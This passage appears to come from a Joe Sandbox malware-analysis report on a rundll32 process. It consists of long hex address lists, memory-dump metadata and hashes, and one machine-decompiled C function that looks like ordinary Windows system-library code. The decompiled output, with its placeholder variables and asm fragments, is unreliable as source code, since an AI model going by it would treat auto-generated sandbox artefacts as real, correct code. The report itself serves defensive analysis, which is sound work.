                                                                                                                0x00000000
                                                                                                                0x044245a9
                                                                                                                0x044245a9
                                                                                                                0x044245b0
                                                                                                                0x0446e1d1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044245b6
                                                                                                                0x044245b6
                                                                                                                0x044245b6
                                                                                                                0x00000000
                                                                                                                0x044245b6
                                                                                                                0x044245b0
                                                                                                                0x044245a3
                                                                                                                0x04424599
                                                                                                                0x0442458c
                                                                                                                0x04424582
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044241f4
                                                                                                                0x0442423e
                                                                                                                0x04424241
                                                                                                                0x044245c0
                                                                                                                0x044245c4
                                                                                                                0x00000000
                                                                                                                0x044245ca
                                                                                                                0x044245ca
                                                                                                                0x00000000
                                                                                                                0x0446e207
                                                                                                                0x0446e20f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044245d1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044245ca
                                                                                                                0x00000000
                                                                                                                0x04424247
                                                                                                                0x04424247
                                                                                                                0x04424247
                                                                                                                0x04424249
                                                                                                                0x04424249
                                                                                                                0x04424249
                                                                                                                0x04424251
                                                                                                                0x04424251
                                                                                                                0x04424257
                                                                                                                0x0442425f
                                                                                                                0x0442426e
                                                                                                                0x04424270
                                                                                                                0x0442427a
                                                                                                                0x0446e219
                                                                                                                0x0446e219
                                                                                                                0x04424280
                                                                                                                0x04424282
                                                                                                                0x04424456
                                                                                                                0x044245ea
                                                                                                                0x00000000
                                                                                                                0x044245f0
                                                                                                                0x0446e223
                                                                                                                0x00000000
                                                                                                                0x0446e223
                                                                                                                0x0442445c
                                                                                                                0x0442445c
                                                                                                                0x00000000
                                                                                                                0x0442445c
                                                                                                                0x00000000
                                                                                                                0x04424288
                                                                                                                0x0442428c
                                                                                                                0x0446e298
                                                                                                                0x04424292
                                                                                                                0x04424292
                                                                                                                0x0442429e
                                                                                                                0x044242a3
                                                                                                                0x044242a7
                                                                                                                0x044242ac
                                                                                                                0x0446e22d
                                                                                                                0x044242b2
                                                                                                                0x044242b2
                                                                                                                0x044242b9
                                                                                                                0x044242bc
                                                                                                                0x044242c2
                                                                                                                0x044242ca
                                                                                                                0x044242cd
                                                                                                                0x044242cd
                                                                                                                0x044242d4
                                                                                                                0x0442433f
                                                                                                                0x0442433f
                                                                                                                0x044242d6
                                                                                                                0x044242d6
                                                                                                                0x044242d9
                                                                                                                0x044242dd
                                                                                                                0x044242eb
                                                                                                                0x0446e23a
                                                                                                                0x044242f1
                                                                                                                0x04424305
                                                                                                                0x0442430d
                                                                                                                0x04424315
                                                                                                                0x04424318
                                                                                                                0x0442431f
                                                                                                                0x04424322
                                                                                                                0x0442432e
                                                                                                                0x0442433b
                                                                                                                0x0442433b
                                                                                                                0x00000000
                                                                                                                0x0442432e
                                                                                                                0x044242eb
                                                                                                                0x0442434c
                                                                                                                0x0442434e
                                                                                                                0x04424352
                                                                                                                0x04424359
                                                                                                                0x0442435e
                                                                                                                0x04424361
                                                                                                                0x0442436e
                                                                                                                0x0442438a
                                                                                                                0x0442438e
                                                                                                                0x04424396
                                                                                                                0x0442439e
                                                                                                                0x044243a1
                                                                                                                0x044243ad
                                                                                                                0x044243bb
                                                                                                                0x044243bb
                                                                                                                0x044243ad
                                                                                                                0x0442436e
                                                                                                                0x044243bf
                                                                                                                0x044243c5
                                                                                                                0x04424463
                                                                                                                0x04424463
                                                                                                                0x044243ce
                                                                                                                0x044243d5
                                                                                                                0x044243d9
                                                                                                                0x044243df
                                                                                                                0x04424475
                                                                                                                0x04424479
                                                                                                                0x04424491
                                                                                                                0x04424491
                                                                                                                0x04424479
                                                                                                                0x044243e5
                                                                                                                0x044243eb
                                                                                                                0x044243f4
                                                                                                                0x044243f6
                                                                                                                0x044243f9
                                                                                                                0x044243fc
                                                                                                                0x044243ff
                                                                                                                0x044244e8
                                                                                                                0x044244ed
                                                                                                                0x044244f3
                                                                                                                0x0446e247
                                                                                                                0x00000000
                                                                                                                0x044244f9
                                                                                                                0x04424504
                                                                                                                0x04424508
                                                                                                                0x0442450f
                                                                                                                0x0446e269
                                                                                                                0x00000000
                                                                                                                0x04424515
                                                                                                                0x04424519
                                                                                                                0x04424531
                                                                                                                0x04424534
                                                                                                                0x04424537
                                                                                                                0x0442453e
                                                                                                                0x04424541
                                                                                                                0x0442454a
                                                                                                                0x0446e255
                                                                                                                0x0446e255
                                                                                                                0x0446e25b
                                                                                                                0x0446e25e
                                                                                                                0x0446e261
                                                                                                                0x0446e261
                                                                                                                0x04424555
                                                                                                                0x04424559
                                                                                                                0x0442455d
                                                                                                                0x0446e26d
                                                                                                                0x0446e270
                                                                                                                0x0446e274
                                                                                                                0x0446e27a
                                                                                                                0x0446e27d
                                                                                                                0x0446e28e
                                                                                                                0x0446e28e
                                                                                                                0x04424563
                                                                                                                0x04424563
                                                                                                                0x04424569
                                                                                                                0x04424569
                                                                                                                0x00000000
                                                                                                                0x0442455d
                                                                                                                0x0442450f
                                                                                                                0x00000000
                                                                                                                0x044244f3
                                                                                                                0x044243ff
                                                                                                                0x04424405
                                                                                                                0x04424405
                                                                                                                0x04424405
                                                                                                                0x044242ac
                                                                                                                0x0442428c
                                                                                                                0x04424282
                                                                                                                0x04424407
                                                                                                                0x0442440d
                                                                                                                0x0446e2af
                                                                                                                0x0446e2af
                                                                                                                0x04424413
                                                                                                                0x04424413
                                                                                                                0x00000000
                                                                                                                0x044241d4
                                                                                                                0x00000000
                                                                                                                0x044241c3
                                                                                                                0x044241bd
                                                                                                                0x04424415
                                                                                                                0x04424415
                                                                                                                0x04424416
                                                                                                                0x04424417
                                                                                                                0x04424429
                                                                                                                0x0442416e
                                                                                                                0x0442416e
                                                                                                                0x04424175
                                                                                                                0x04424498
                                                                                                                0x0442449f
                                                                                                                0x0446e12d
                                                                                                                0x00000000
                                                                                                                0x0446e133
                                                                                                                0x00000000
                                                                                                                0x0446e133
                                                                                                                0x044244a5
                                                                                                                0x044244a5
                                                                                                                0x044244aa
                                                                                                                0x00000000
                                                                                                                0x044244bb
                                                                                                                0x044244ca
                                                                                                                0x044244d6
                                                                                                                0x044244d7
                                                                                                                0x044244d8
                                                                                                                0x044244e3
                                                                                                                0x044244e3
                                                                                                                0x044244aa
                                                                                                                0x0442417b
                                                                                                                0x0442417b
                                                                                                                0x0442417b
                                                                                                                0x00000000
                                                                                                                0x0442417b
                                                                                                                0x04424175
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5fff62569b6182d40e75f42e257f8b2a96c00722aee6f9f105fb45f08e843485
                                                                                                                • Instruction ID: c2adb1cc5e0e86de374d9854d9ddfbb4c346b9422ee0d40c9a65e9c03a9ca491
                                                                                                                • Opcode Fuzzy Hash: 5fff62569b6182d40e75f42e257f8b2a96c00722aee6f9f105fb45f08e843485
                                                                                                                • Instruction Fuzzy Hash: 2EF18D746086218BDB24CF59C580A7BB7E1EF88748F94492FF486CB391E734E981DB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044320A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E044320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x44f8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04432EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04432EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E044058EC(_t240);
									_t221 =  *0x44f5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x44f5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04444A2C(0x44f6e40, 0x4444b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04427D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x43e5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0443F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0443F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04487016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04422400(_t267 + 0x20);
															}
															L04422400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04432397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04422280(_t134, 0x44f8608);
									__eflags =  *0x44f6e48 - _t253; // 0x36d670
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0441FFB0(_t198, _t241, 0x44f8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x44f6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x44f8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04436B90(_t210,  &_v64);
										_t262 =  *0x44f8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0443E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E044497C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0444006A(0x44f8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x44f8608);
												E0444B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x44f6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x44f6e48; // 0x36d670
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E0441FFB0(_t198, _t240, 0x44f8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E044400C2(0x44f8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x0
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                                0x044320a0
                                                                                                                0x044320a8
                                                                                                                0x044320ad
                                                                                                                0x044320b3
                                                                                                                0x044320b8
                                                                                                                0x044320c2
                                                                                                                0x044320c7
                                                                                                                0x044320cb
                                                                                                                0x044320d2
                                                                                                                0x04432263
                                                                                                                0x04432266
                                                                                                                0x04475836
                                                                                                                0x04475836
                                                                                                                0x00000000
                                                                                                                0x0443226c
                                                                                                                0x0443226c
                                                                                                                0x04432270
                                                                                                                0x04432274
                                                                                                                0x044320e2
                                                                                                                0x044320e2
                                                                                                                0x044320e6
                                                                                                                0x044320ee
                                                                                                                0x044757dc
                                                                                                                0x044757de
                                                                                                                0x044757ec
                                                                                                                0x044757ec
                                                                                                                0x044757f1
                                                                                                                0x044757f3
                                                                                                                0x044757f8
                                                                                                                0x00000000
                                                                                                                0x044757f8
                                                                                                                0x044757e0
                                                                                                                0x044757e4
                                                                                                                0x044757ea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044757ea
                                                                                                                0x044320f4
                                                                                                                0x044320f4
                                                                                                                0x044320f8
                                                                                                                0x044320f8
                                                                                                                0x044320fc
                                                                                                                0x04432100
                                                                                                                0x04432106
                                                                                                                0x04432201
                                                                                                                0x04432206
                                                                                                                0x0443220b
                                                                                                                0x0443220e
                                                                                                                0x044322a9
                                                                                                                0x044322ac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044322b2
                                                                                                                0x044322b5
                                                                                                                0x04475801
                                                                                                                0x04475806
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475810
                                                                                                                0x04475815
                                                                                                                0x04475818
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447581e
                                                                                                                0x044322bb
                                                                                                                0x044322bb
                                                                                                                0x04432218
                                                                                                                0x04432218
                                                                                                                0x0443221c
                                                                                                                0x04432220
                                                                                                                0x04432222
                                                                                                                0x044322c2
                                                                                                                0x044322c4
                                                                                                                0x044322dc
                                                                                                                0x044322dc
                                                                                                                0x044322e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044322e7
                                                                                                                0x044322c8
                                                                                                                0x044322cd
                                                                                                                0x044322d3
                                                                                                                0x044322d6
                                                                                                                0x04475823
                                                                                                                0x04475825
                                                                                                                0x04475827
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447582d
                                                                                                                0x00000000
                                                                                                                0x0447582d
                                                                                                                0x00000000
                                                                                                                0x04432228
                                                                                                                0x04432228
                                                                                                                0x00000000
                                                                                                                0x04432228
                                                                                                                0x04432222
                                                                                                                0x04432214
                                                                                                                0x04432214
                                                                                                                0x00000000
                                                                                                                0x04432114
                                                                                                                0x04432114
                                                                                                                0x04432114
                                                                                                                0x0443211a
                                                                                                                0x0443211c
                                                                                                                0x04432348
                                                                                                                0x0443234d
                                                                                                                0x04475840
                                                                                                                0x04475845
                                                                                                                0x04475848
                                                                                                                0x0447584e
                                                                                                                0x0447584e
                                                                                                                0x04475848
                                                                                                                0x04432353
                                                                                                                0x04432355
                                                                                                                0x04432388
                                                                                                                0x04432388
                                                                                                                0x04432368
                                                                                                                0x0443236a
                                                                                                                0x0443236c
                                                                                                                0x0443238f
                                                                                                                0x00000000
                                                                                                                0x0443236e
                                                                                                                0x0443236e
                                                                                                                0x0443218e
                                                                                                                0x0443218e
                                                                                                                0x04432191
                                                                                                                0x04432195
                                                                                                                0x04475a03
                                                                                                                0x04475a06
                                                                                                                0x04475a0c
                                                                                                                0x04475a0f
                                                                                                                0x04475a11
                                                                                                                0x04475a13
                                                                                                                0x04475a13
                                                                                                                0x04475a19
                                                                                                                0x04475a1f
                                                                                                                0x00000000
                                                                                                                0x0443219b
                                                                                                                0x0443219b
                                                                                                                0x044321a0
                                                                                                                0x04432282
                                                                                                                0x04432284
                                                                                                                0x04432284
                                                                                                                0x04432284
                                                                                                                0x04432284
                                                                                                                0x044321a6
                                                                                                                0x044321a9
                                                                                                                0x044321ac
                                                                                                                0x044321ae
                                                                                                                0x044321b3
                                                                                                                0x0443228b
                                                                                                                0x04432290
                                                                                                                0x04432379
                                                                                                                0x04432296
                                                                                                                0x04432298
                                                                                                                0x04432298
                                                                                                                0x04432290
                                                                                                                0x044321b9
                                                                                                                0x044321be
                                                                                                                0x044322a2
                                                                                                                0x044322a2
                                                                                                                0x044321c4
                                                                                                                0x044321c8
                                                                                                                0x044321cc
                                                                                                                0x044321d0
                                                                                                                0x044321d4
                                                                                                                0x044321de
                                                                                                                0x044321e3
                                                                                                                0x04475a29
                                                                                                                0x04475a2c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475a3b
                                                                                                                0x00000000
                                                                                                                0x044321e9
                                                                                                                0x044321e9
                                                                                                                0x044321e9
                                                                                                                0x044321ee
                                                                                                                0x044321f1
                                                                                                                0x04475a45
                                                                                                                0x04475a4b
                                                                                                                0x04475a52
                                                                                                                0x04475a58
                                                                                                                0x04475a5d
                                                                                                                0x04475a5f
                                                                                                                0x04475a71
                                                                                                                0x04475a61
                                                                                                                0x04475a6a
                                                                                                                0x04475a6a
                                                                                                                0x04475a76
                                                                                                                0x04475a79
                                                                                                                0x04475a7f
                                                                                                                0x04475a83
                                                                                                                0x04475a85
                                                                                                                0x04475a87
                                                                                                                0x04475a87
                                                                                                                0x04475a8c
                                                                                                                0x04475a91
                                                                                                                0x04475a97
                                                                                                                0x04475a9f
                                                                                                                0x04475aa0
                                                                                                                0x04475aa1
                                                                                                                0x04475aa6
                                                                                                                0x04475aab
                                                                                                                0x04475ab1
                                                                                                                0x04475ab3
                                                                                                                0x04475ab9
                                                                                                                0x04475aca
                                                                                                                0x04475ad4
                                                                                                                0x04475ad4
                                                                                                                0x04475ade
                                                                                                                0x04475ade
                                                                                                                0x04475aab
                                                                                                                0x04475a79
                                                                                                                0x04475a52
                                                                                                                0x044321f7
                                                                                                                0x044321f9
                                                                                                                0x044321fe
                                                                                                                0x044321fe
                                                                                                                0x044321e3
                                                                                                                0x04432195
                                                                                                                0x0443236c
                                                                                                                0x04432122
                                                                                                                0x04432122
                                                                                                                0x04432124
                                                                                                                0x04432231
                                                                                                                0x04432236
                                                                                                                0x04432236
                                                                                                                0x04432238
                                                                                                                0x04432238
                                                                                                                0x04432240
                                                                                                                0x04432242
                                                                                                                0x04432244
                                                                                                                0x044759fc
                                                                                                                0x0443218c
                                                                                                                0x0443218c
                                                                                                                0x00000000
                                                                                                                0x0443218c
                                                                                                                0x0443224a
                                                                                                                0x0443224f
                                                                                                                0x04432256
                                                                                                                0x04432304
                                                                                                                0x04432309
                                                                                                                0x0443230f
                                                                                                                0x0443231e
                                                                                                                0x0443231e
                                                                                                                0x0443231e
                                                                                                                0x04432320
                                                                                                                0x04432325
                                                                                                                0x0443232a
                                                                                                                0x0443232c
                                                                                                                0x0443233e
                                                                                                                0x0443233e
                                                                                                                0x00000000
                                                                                                                0x0443232c
                                                                                                                0x04432311
                                                                                                                0x04432317
                                                                                                                0x0443231a
                                                                                                                0x0443231c
                                                                                                                0x04432380
                                                                                                                0x04432380
                                                                                                                0x04432380
                                                                                                                0x04432384
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432386
                                                                                                                0x00000000
                                                                                                                0x0443231c
                                                                                                                0x0443225c
                                                                                                                0x0443225c
                                                                                                                0x00000000
                                                                                                                0x0443225c
                                                                                                                0x0443212a
                                                                                                                0x04432134
                                                                                                                0x04432138
                                                                                                                0x0443213d
                                                                                                                0x04475858
                                                                                                                0x04475863
                                                                                                                0x04475863
                                                                                                                0x04475867
                                                                                                                0x0447586a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447586c
                                                                                                                0x0447586c
                                                                                                                0x04475871
                                                                                                                0x04475875
                                                                                                                0x04475877
                                                                                                                0x04475997
                                                                                                                0x0447599c
                                                                                                                0x044759a1
                                                                                                                0x044759a7
                                                                                                                0x044759a7
                                                                                                                0x00000000
                                                                                                                0x044759a7
                                                                                                                0x0447587d
                                                                                                                0x00000000
                                                                                                                0x0447588b
                                                                                                                0x0447588b
                                                                                                                0x04475890
                                                                                                                0x04475892
                                                                                                                0x04475894
                                                                                                                0x04475899
                                                                                                                0x0447589b
                                                                                                                0x044758a0
                                                                                                                0x044758a0
                                                                                                                0x044758aa
                                                                                                                0x044758b2
                                                                                                                0x044758b6
                                                                                                                0x044758be
                                                                                                                0x044758c6
                                                                                                                0x044758c9
                                                                                                                0x0447590d
                                                                                                                0x04475917
                                                                                                                0x0447591a
                                                                                                                0x0447591c
                                                                                                                0x04475920
                                                                                                                0x04475928
                                                                                                                0x0447592a
                                                                                                                0x0447592c
                                                                                                                0x0447592e
                                                                                                                0x0447592e
                                                                                                                0x044758cb
                                                                                                                0x044758cd
                                                                                                                0x044758d8
                                                                                                                0x044758e0
                                                                                                                0x044758f4
                                                                                                                0x044758fe
                                                                                                                0x044758fe
                                                                                                                0x0447593a
                                                                                                                0x0447593e
                                                                                                                0x04475940
                                                                                                                0x04475942
                                                                                                                0x00000000
                                                                                                                0x04475944
                                                                                                                0x04475944
                                                                                                                0x04475949
                                                                                                                0x0447594e
                                                                                                                0x0447594e
                                                                                                                0x04475953
                                                                                                                0x0447595b
                                                                                                                0x04475976
                                                                                                                0x04475976
                                                                                                                0x0447597a
                                                                                                                0x0447597f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475981
                                                                                                                0x04475981
                                                                                                                0x04475981
                                                                                                                0x04475983
                                                                                                                0x04475988
                                                                                                                0x0447598d
                                                                                                                0x04475991
